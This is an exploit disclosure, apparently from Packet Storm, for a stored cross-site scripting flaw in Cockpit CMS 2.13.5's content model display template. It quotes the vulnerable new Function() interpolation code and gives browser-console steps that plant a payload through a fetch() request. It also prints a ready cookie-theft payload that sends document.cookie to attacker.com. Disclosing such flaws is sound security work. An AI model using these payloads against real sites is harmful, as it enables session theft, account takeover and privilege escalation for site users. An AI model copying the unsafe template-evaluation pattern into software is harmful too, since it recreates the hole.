## https://sploitus.com/exploit?id=PACKETSTORM:218539
*Description:* Cockpit CMS version 2.13.5 has a stored XSS in the content
model display template. The $interpolate function in
/modules/App/assets/js/app/utils.js uses new Function() to evaluate
template strings, allowing arbitrary JavaScript execution. Any
authenticated user who can edit content models can inject a payload via the
meta.display field that fires automatically for all users visiting the
Content page. Impact includes session hijacking, account takeover, and
privilege escalation.
Source URL: https://github.com/Cockpit-HQ/Cockpit
Software URL: https://getcockpit.com/
Vulnerable Code (/modules/App/assets/js/app/utils.js):
let interpolate = function(str, params) {
const names = Object.keys(params);
const vals = Object.values(params);
return new Function(...names, `return \`${str}\`;`)(...vals);
}
*Steps to Reproduce:*
1. Log in to Cockpit CMS
2. Create a content model called "testmodel" with a text field
3. Run this in the browser console:
const csrf = App.csrf;
fetch('/content/models/save', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrf },
body: JSON.stringify({
model: {
name: 'testmodel',
type: 'collection',
meta: { display: "${document.title='XSS_CONFIRMED_' +
document.domain}" }
},
isUpdate: true
})
});
4. Visit /content - the browser tab title changes to
"XSS_CONFIRMED_localhost"
Cookie theft payload: ${fetch('https://attacker.com/?cookie=' +
document.cookie)}
*Impact:*- Stored XSS fires automatically, no user interaction needed
- Session cookies have no HttpOnly flag, allowing theft
- Content editor can escalate to admin
*Disclosure Timeline:*- Vendor contacted, no response received
- 2026-04-07 Public disclosure to packetstorm